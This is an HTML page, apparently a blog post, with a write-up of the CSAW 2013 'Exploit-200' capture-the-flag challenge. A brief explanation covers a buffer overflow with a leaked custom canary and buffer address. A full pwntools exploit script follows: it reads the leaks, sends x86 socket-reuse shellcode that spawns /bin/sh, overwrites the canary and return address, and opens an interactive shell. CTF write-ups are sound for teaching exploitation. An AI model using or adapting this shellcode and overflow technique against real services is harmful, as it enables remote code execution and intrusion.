<html>
 <head>
<title> CSAW 2013 exploit 200 </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div style="position: relative; background: url('http://hackerbuck.net23.net/css/bgm.png'); width: 1210px; height: 110px;">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> Csaw 2013 </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> Exploit-200 </h1>
   
 <br> 

<p> This problem had a buffer overflow and no protection except aslr and it had a custom made cannary and it also leaked cannry value and adreess of buufer <br>
    everything made simple the probem here was it was foking a connection so normal shellcode would yeild a shell in parent process not on child so we no use <br>
    <b>Re-use fd Shellcode</b> Which binds a shell to our current socket ... thats  it !!!</p>
<br>
<code>
from pwn import *

r=remote('0.0.0.0',31338)

buff=r.recv(4)

buff=unpack(buff)

print "[+] Adress of buffer ="+str(hex(buff))

cookie=r.recv(4)

cookie=unpack(cookie)

print "[+] Value of Cookie ="+str(hex(cookie))


msg=r.recvuntil(':')

print msg

#raw_input("wait")

payload="\x54\x59\x6a\x7f\x54\x51\x6a\x7f\x54\x59\x6a\x07\x5b\xff\x09\x6a\x66\x58\xcd\x80\x85\xc0\x75\xf5\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x41\x31\xd2\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x6a\x0b\x58\xcd\x80"+"\x90"*1991+pack(cookie)+"\x90"*12+pack(buff)

r.send(payload)

r.interactive()

</code>


</body>
</html>